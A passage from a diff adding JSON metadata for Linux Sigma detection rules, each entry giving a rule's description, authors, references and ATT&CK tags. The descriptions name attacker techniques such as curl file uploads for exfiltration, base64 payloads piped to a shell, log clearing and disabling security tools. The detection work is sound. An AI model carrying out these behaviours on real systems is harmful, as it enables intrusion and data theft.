"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.t1548.003", + "cve.2019.14287" + ] + }, + "uuid": "f74107df-b6c6-4e80-bf00-4170b658162b", + "value": "Sudo Privilege Escalation CVE-2019-14287" + }, + { + "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_lnx_base64_decode.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e2072cab-8c9a-459b-b63c-40ae79e27031", + "value": "Decode Base64 Encoded Text" + }, + { + "description": "Detects the enumeration of other remote systems.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/22", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_remote_system_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "11063ec2-de63-4153-935e-b1a8b9e616f1", + "value": "Linux Remote System Discovery" + }, + { + "description": "Detects disabling security tools", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/06/17", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_security_tools_disabling.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "e3a8a052-111f-4606-9aee-f28ebeb76776", + "value": "Disabling Security Tools" + }, + { + "description": "Detects execution of a the file \"execve_hijack\" which is used by the Triple Cross rootkit as a way to elevate privileges", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ] + }, + "uuid": "0326c3c8-7803-4a0f-8c5c-368f747f7c3e", + "value": "Triple Cross eBPF Rootkit Execve Hijack" + }, + { + "description": "Detects usage of \"vim\" and it's sibilings as a GTFOBin to execute and proxy command and binary execution", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_gtfobin_vim.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://gtfobins.github.io/gtfobins/vim/", + "https://gtfobins.github.io/gtfobins/vimdiff/", + "https://gtfobins.github.io/gtfobins/rvim/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "7ab8f73a-fcff-428b-84aa-6a5ff7877dea", + "value": "Vim GTFOBin Abuse - Linux" + }, + { + "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/14", + "falsepositive": [ + "Legitimate software that uses these patterns" + ], + "filename": "proc_creation_lnx_susp_interactive_bash.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml" + ], + "tags": "No established tags" + }, + "uuid": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", + "value": "Interactive Bash Suspicious Children" + }, + { + "description": "Detects usage of system utilities to discover files and directories", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_lnx_file_and_directory_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", + "value": "File and Directory Discovery - Linux" + }, + { + "description": "Detects usage of \"find\" binary in a suspicious manner to perform discovery", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_susp_find_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf", + "value": "Potential Discovery Activity Using Find - Linux" + }, + { + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "meta": { + "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Legitimate usage of xclip tools." + ], + "filename": "proc_creation_lnx_clipboard_collection.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.packetlabs.net/posts/clipboard-data-security/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "ec127035-a636-4b9a-8555-0efd4e59f316", + "value": "Clipboard Collection with Xclip Tool" + }, + { + "description": "Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_local_account.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_account.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ] + }, + "uuid": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c", + "value": "Local System Accounts Discovery - Linux" + }, + { + "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_susp_recon_indicators.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004", + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "0cf7a157-8879-41a2-8f55-388dd23746b7", + "value": "Linux Recon Indicators" + }, + { + "description": "Detects chmod targeting files in abnormal directory paths.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/03", + "falsepositive": [ + "Admin changing file permissions." + ], + "filename": "proc_creation_lnx_susp_chmod_directories.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "6419afd1-3742-47a5-a7e6-b50386cd15f8", + "value": "Chmod Suspicious Directory" + }, + { + "description": "Detects python spawning a pretty tty", + "meta": { + "author": "Nextron Systems", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_python_pty_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "c4042d54-110d-45dd-a0e1-05c47822c937", + "value": "Python Spawning Pretty TTY" + }, + { + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml" + ], + "tags": [ + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059", + "cve.2022.26134" + ] + }, + "uuid": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", + "value": "Atlassian Confluence CVE-2022-26134" + }, + { + "description": "Detects a suspicious curl process start the adds a file to a web request", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Scripts created by developers and admins" + ], + "filename": "proc_creation_lnx_susp_curl_fileupload.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://curl.se/docs/manpage.html", + "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567", + "attack.t1105" + ] + }, + "uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582", + "value": "Suspicious Curl File Upload - Linux" + }, + { + "description": "Detects usage of \"apt\" and \"apt-get\" as a GTFOBin to execute and proxy command and binary execution", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_gtfobin_apt.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://gtfobins.github.io/gtfobins/apt/", + "https://gtfobins.github.io/gtfobins/apt-get/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "bb382fd5-b454-47ea-a264-1828e4c766d6", + "value": "Apt GTFOBin Abuse - Linux" + }, + { + "description": "Detects execution of the \"userdel\" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks", + "meta": { + "author": "Tuan Le (NCSGroup)", + "creation_date": "2022/12/26", + "falsepositive": [ + "Legitimate administrator activities" + ], + "filename": "proc_creation_lnx_userdel.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://linuxize.com/post/how-to-delete-group-in-linux/", + "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", + "https://linux.die.net/man/8/userdel", + "https://www.cyberciti.biz/faq/linux-remove-user-command/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ] + }, + "uuid": "08f26069-6f80-474b-8d1f-d971c6fedea0", + "value": "User Has Been Deleted Via Userdel" + }, + { + "description": "Detects system information discovery commands", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_system_info_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", + "value": "System Information Discovery" + }, + { + "description": "Detects command line parameters or strings often used by crypto miners", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "filename": "proc_creation_lnx_crypto_mining.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml" + ], + "tags": "No established tags" + }, + "uuid": "9069ea3c-b213-4c52-be13-86506a227ab1", + "value": "Linux Crypto Mining Indicators" + }, + { + "description": "Detects potential overwriting and deletion of a file using DD.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Any user deleting files that way." + ], + "filename": "proc_creation_lnx_dd_file_overwrite.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "2953194b-e33c-4859-b9e8-05948c167447", + "value": "DD File Overwrite" + }, + { + "description": "Detects installation of suspicious packages using system installation utilities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/03", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_install_suspicioua_packages.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] + }, + "uuid": "700fb7e8-2981-401c-8430-be58e189e741", + "value": "Suspicious Package Installed - Linux" + }, + { + "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_schedule_task_job_cron.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.003" + ] + }, + "uuid": "6b14bac8-3e3a-4324-8109-42f0546a347f", + "value": "Scheduled Cron Task/Job - Linux" + }, + { + "description": "Detects usage of system utilities to discover system network connections", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_lnx_system_network_connections_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", + "value": "System Network Connections Discovery - Linux" + }, + { + "description": "Detects enumeration of local network configuration", + "meta": { + "author": "Ömer Günal and remotephone, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_system_network_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ] + }, + "uuid": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", + "value": "System Network Discovery - Linux" + }, + { + "description": "Detects a suspicious curl process start on linux with set useragent options", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_lnx_susp_curl_useragent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://curl.se/docs/manpage.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "b86d356d-6093-443d-971c-9b07db583c68", + "value": "Suspicious Curl Change User Agents - Linux" + }, + { + "description": "Detects suspicious sub processes of web server processes", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali (update)", + "creation_date": "2021/10/15", + "falsepositive": [ + "Web applications that invoke Linux command line tools" + ], + "filename": "proc_creation_lnx_webshell_detection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", + "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "818f7b24-0fba-4c49-a073-8b755573b9c7", + "value": "Linux Webshell Indicators" + }, + { + "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_at_command.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_at_command.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.002" + ] + }, + "uuid": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", + "value": "Scheduled Task/Job At" + }, + { + "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_susp_history_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004" + ] + }, + "uuid": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", + "value": "Print History File Contents" + }, + { + "description": "Detects the usage of the unsafe bpftrace option", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate usage of the unsafe option" + ], + "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", + "https://bpftrace.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", + "value": "BPFtrace Unsafe Option Usage" + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider ExecuteScript." + ], + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ] + }, + "uuid": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", + "value": "OMIGOD SCX RunAsProvider ExecuteScript" + }, + { + "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell", + "meta": { + "author": "pH-T", + "creation_date": "2022/07/26", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_base64_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/arget13/DDexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "ba592c6d-6888-43c3-b8c6-689b8fe47337", + "value": "Linux Base64 Encoded Pipe to Shell" + }, + { + "description": "Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_clear_logs.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ] + }, + "uuid": "80915f59-9b56-4616-9de0-fd0dea6c12fe", + "value": "Clear Linux Logs" + }, + { + "description": "Detects execution of the \"groupdel\" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks", + "meta": { + "author": "Tuan Le (NCSGroup)", + "creation_date": "2022/12/26", + "falsepositive": [ + "Legitimate administrator activities" + ], + "filename": "proc_creation_lnx_groupdel.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://linuxize.com/post/how-to-delete-group-in-linux/", + "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", + "https://linux.die.net/man/8/groupdel", + "https://www.cyberciti.biz/faq/linux-remove-user-command/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ] + }, + "uuid": "8a46f16c-8c4c-82d1-b121-0fdd3ba70a84", + "value": "Group Has Been Deleted Via Groupdel" + }, + { + "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_base64_shebang_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS", + "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", + "value": "Linux Base64 Encoded Shebang In CLI" + }, + { + "description": "Detects usage of \"getcap\" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_capa_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", + "https://github.com/carlospolop/PEASS-ng", + "https://github.com/diego-treitos/linux-smart-enumeration", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "d8d97d51-122d-4cdd-9e2f-01b4b4933530", + "value": "Capabilities Discovery - Linux" + }, + { + "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/14", + "falsepositive": [ + "Legitimate software that uses these patterns" + ], + "filename": "proc_creation_lnx_susp_pipe_shell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "880973f3-9708-491c-a77b-2a35a1921158", + "value": "Linux Shell Pipe to Shell" + }, + { + "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_lnx_curl_usage.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + 